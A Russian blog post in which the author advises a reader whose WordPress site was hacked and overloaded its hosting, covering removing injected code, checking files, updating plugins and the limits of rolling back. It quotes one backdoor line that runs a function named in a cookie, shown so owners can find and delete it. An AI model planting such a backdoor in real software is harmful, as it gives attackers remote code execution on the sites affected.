Что делать, если сайт создает повышенную нагрузку на хостинг
Что делать, если сайт создает повышенную нагрузку на хостинг

Пересмешник, привет. Тут вот такая ерунда с моим сайтом, хотелось узнать твое мнение, если ты встречал такое.

И дальше выдержка из переписки с технической поддержкой хостинга, где техническая поддержка объясняет, что сайт создает повышенную нагрузку на хостинг. Что в файлах есть вредоносные вставки кода, которые, собственно, эту самую нагрузку и создают.

Вы являетесь клиентом нашего Хостинга.
Нагрузка на сервер, созданная Вашей услугой виртуального хостинга с начала текущих суток, составила «очень много» процессорных минут. Это превышает допустимое на Вашем тарифе суточное ограничение в «гораздо меньше» процессорных минут.
Пожалуйста, примите меры по уменьшению создаваемой нагрузки. В случае если нагрузка будет продолжать превышать допустимый уровень, мы будем вынуждены приостановить работу Вашей услуги.

Мы получили письмо.
Т.к. мы не специалисты, то находимся в недоумении и не совсем представляем, что нам с этим делать.
Скажите, можно ли сделать восстановление сайта с последней рабочей версии – к примеру, от даты «примерно неделю назад».

Обнаружили вредоносные вставки кода в следующих файлах, из-за которых создавалась нагрузка: «тут большой перечень ссылок на файлы»
Пожалуйста, удалите вредоносный код из данных файлов, если он не имеет отношения к Вашему сайту. Также хотим заметить, что это могут быть не все возможные файлы с вредоносным кодом. Рекомендуем обратиться к разработчикам для более подробного аудита сайта.

Пересмешник, конечно же в теме:

Ну как не встречал. И мои сайты иногда ломают :)

Какой-то прыщавый кул-хацкер взломал сайт и напихал туда бекдоров. В данном случае поработал именно прыщавый и именно кул-хацкер, потому что нормальные посоны оставляют одну неприметную дырочку и пользуются ей годами. А здесь из сайта решето сделали, то есть на долгую жизнь своей работы не рассчитывали. Либо по незнанию.

Собственно, порядок действий:
1. Зайти в каждый указанный в этом перечне файл и удалить оттуда вредоносный код.
2. Зайти во все остальные файлы и проверить, нет ли чего и там.
3. Обновить движок и все плагины до актуальных версий.

Откат сайта до какой-то предыдущей версии скорее всего ничего не даст, так как хостеры делают бекапы на неделю, ну может быть на две. А когда был внедрен вредоносный код, не известно, скорее всего раньше. Хотя, можно попытаться.

Пересмешник

Что делать, если сайт создает повышенную нагрузку на хостинг
Что делать, если сайт создает повышенную нагрузку на хостинг

Пересмешник, можно тебя попросить, я прикрепил часть файлов с сайта, можешь мне показать — что удалять? Спасибо!!!

Думал, что отделался мудрым советом, ан нет. Пришлось самому в коде ковыряться.

Вот этим кодом в каждом файле вызывается вредная функция:

if (isset($_COOKIE[«id»])) @$_COOKIE[«user»]($_COOKIE[«id»]);

Эту строчку можешь смело удалять.

Сама функция формируется где-то в другом месте. Как правило, это файл functions.php в папке темы, но не всегда.

Пересмешник

http://peresmeshnick.ru/wp-content/uploads/2016/10/взлом-сайта.jpghttp://peresmeshnick.ru/wp-content/uploads/2016/10/взлом-сайта-300x300.jpgПересмешникИнтернетWordPress,взлом сайта,Интернет,нагрузка на хостинг,сайт на WordPressПересмешник, привет. Тут вот такая ерунда с моим сайтом, хотелось узнать твое мнение, если ты встречал такое. И дальше выдержка из переписки с технической поддержкой хостинга, где техническая поддержка объясняет, что сайт создает повышенную нагрузку на хостинг. Что в файлах есть вредоносные вставки кода, которые, собственно, эту самую нагрузку и...Все познается в сравнении. Или не познается.